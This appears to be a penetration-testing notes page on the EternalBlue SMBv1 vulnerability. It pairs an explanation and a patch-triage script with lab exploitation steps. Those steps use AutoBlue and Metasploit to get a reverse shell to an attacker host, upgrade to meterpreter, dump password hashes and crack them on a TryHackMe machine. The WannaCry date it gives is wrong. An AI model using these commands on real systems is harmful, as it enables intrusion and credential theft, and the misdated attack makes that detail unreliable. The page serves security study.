# CVE-2017-0144: EternalBlue: MS17-010

{% embed url="<https://learn.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>" %}

**EternalBlue (MS17-010/CVE-2017-0144)** is a critical vulnerability in the Windows Server Message Block (SMBv1) protocol that allows attackers to remotely execute arbitrary code and gain access to a Windows system, potentially compromising the entire network. The exploit, developed by the NSA, was leaked by a hacker group called the Shadow Brokers in 2017.

## **Why the Vulnerability Occurs**

The vulnerability occurs due to improper handling of specially crafted SMBv1 packets, allowing attackers to send malicious packets to a vulnerable machine. This flaw enables attackers to execute arbitrary commands remotely without authentication.

The root cause is a **buffer overflow** in the Windows SMBv1 implementation, triggered by improper validation of transaction requests. Specifically, the server mishandles the length of the input data fields and the associated error conditions, so a crafted request corrupts memory and lets an attacker execute arbitrary code remotely. Because the SMB server runs with high privileges, the result is remote code execution at that privilege level, which is what made it a critical issue and allowed it to be used to propagate malware like WannaCry across networks.

{% embed url="<https://nvd.nist.gov/vuln/detail/cve-2017-0144>" %}

{% embed url="<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0144>" %}

## **Key Features of EternalBlue**

* Exploits the SMBv1 vulnerability (MS17-010) in unpatched Windows systems.
* Affected versions include Windows Vista, 7, Server 2008, 8.1, Server 2012, 10, and Server 2016.
* Was infamously used in the WannaCry ransomware attack on June 27, 2017, which spread rapidly across networks.

Microsoft released a patch for the vulnerability in March 2017, but many systems remain unpatched, leaving them vulnerable to attacks.

## Exploitation

### MSF

[Vulnerability Scanning](/ollivanders/metasploit-framework/vulnerability-scanning.md#eternal-blue-exploit)

EternalBlue allows attackers to send crafted packets to a vulnerable system, gaining privileged access. It has an **MSF auxiliary module** to check if a system is vulnerable and an **exploit module** to execute the attack, granting a privileged session on unpatched systems. The exploit can also be manually executed using publicly available code.

{% embed url="<https://github.com/EEsshq/CVE-2017-0144---EtneralBlue-MS17-010-Remote-Code-Execution>" %}

### AutoBlue

{% embed url="<https://github.com/3ndG4me/AutoBlue-MS17-010>" %}

{% code overflow="wrap" %}

```bash
# nmap for vulnerability assessment
nmap -sV [IP]
nmap -sV -p 445 --script smb-vuln-ms17-010 [IP]

# using autoblue
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010
pip install -r requirements.txt

cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh

nc -lvnp 1234
chmod +x eternalblue_exploit_winx.py
python eternalblue_exploit_winx.py [Victim IP] shellcode/sc_x64.bin

# command shell on the listening port
```

{% endcode %}
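As an added defender-side example (not from the page, nmap or AutoBlue): the `smb-vuln-ms17-010` scan above can be written to XML with `-oX` (as in the TryHackMe section), and this script triages that XML into a list of hosts that still need the MS17-010 patch or SMBv1 disabled. The embedded XML is a constructed sample modelled on nmap's layout for NSE vulns-library scripts; the exact element layout of real output is an assumption.

```python
"""Triage nmap -oX output for smb-vuln-ms17-010 results (patch-tracking / inventory)."""
import xml.etree.ElementTree as ET

# Constructed sample modelled on nmap's XML layout for NSE vulns-library scripts.
# Assumption: real output places the result under <script id=...><table key=CVE><elem key="state">.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -p 445 --script smb-vuln-ms17-010">
  <host><status state="up"/><address addr="10.10.17.20" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/>
      <service name="microsoft-ds" product="Microsoft Windows 7 - 10 microsoft-ds"/>
      <script id="smb-vuln-ms17-010" output="VULNERABLE">
        <table key="CVE-2017-0144"><elem key="state">VULNERABLE</elem>
          <elem key="risk_factor">HIGH</elem></table></script>
    </port></ports></host>
  <host><status state="up"/><address addr="10.10.17.21" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/>
      <script id="smb-vuln-ms17-010" output="NOT VULNERABLE">
        <table key="CVE-2017-0144"><elem key="state">NOT VULNERABLE</elem></table></script>
    </port></ports></host>
  <host><status state="up"/><address addr="10.10.17.22" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="filtered"/></port></ports></host>
</nmaprun>"""


def triage(xml_text):
    """Return {ip: state}; state is VULNERABLE, NOT VULNERABLE or UNKNOWN (no check result)."""
    results = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        state = "UNKNOWN"  # e.g. port 445 filtered, so the script never ran
        for script in host.iter("script"):
            if script.get("id") != "smb-vuln-ms17-010":
                continue
            elem = script.find("table[@key='CVE-2017-0144']/elem[@key='state']")
            if elem is not None and elem.text:
                state = elem.text.strip()
            elif script.get("output"):  # fall back to the free-text output attribute
                state = script.get("output").strip().splitlines()[0]
        results[addr.get("addr")] = state
    return results


def vulnerable_hosts(xml_text):
    """Hosts to ticket for MS17-010 patching / SMBv1 removal, sorted for stable reports."""
    return sorted(ip for ip, s in triage(xml_text).items() if s == "VULNERABLE")


if __name__ == "__main__":
    for ip, state in triage(SAMPLE_XML).items():
        print(f"{ip:15} {state}")
```

Hosts reported UNKNOWN were not actually checked (the port was filtered or the script did not run) and should be re-scanned rather than treated as safe.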

### TryHackMe: Blue Exploitation

{% embed url="<https://tryhackme.com/r/room/blue>" %}

```bash
# scan the machine
sudo nmap -Pn -sV -O -sS 10.10.17.20 -oX nmap-blue.xml
```

#### w/ MSF

```bash
# import the nmap results and set the target globally
db_import nmap-blue.xml
setg RHOSTS 10.10.17.20

# search and use the scanning module
search type:auxiliary name:ms17
use auxiliary/scanner/smb/smb_ms17_010
run

# search and exploit -- easy way: run the module with its default payload
search type:exploit name:ms17
use exploit/windows/smb/ms17_010_eternalblue

# search and exploit -- longer way: pick a plain reverse shell payload first
set payload windows/x64/shell/reverse_tcp
set LHOST [attacker IP]
exploit

# escalate the shell to a meterpreter session
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run

# use the new meterpreter session (id 2 here; check the sessions list)
sessions
sessions -i 2

# cracking: dump the hashes, save them to crack.txt, then run john
hashdump
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

# flag (inside the meterpreter session)
search -f flag*.txt
```

#### w/ AutoBlue

```bash
# in the autoblue directory
cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh

# reverse shell
nc -lvnp 4567
python eternalblue_exploit_winx.py 10.10.17.20 shellcode/sc_x64.bin
```

#### Other semi-MSF write-ups

{% embed url="<https://redteamzone.com/EternalBlue/>" %}

{% embed url="<https://medium.com/@dw3113r/hack-the-box-blue-writeup-without-metasploit-1c6f7e3c586c>" %}
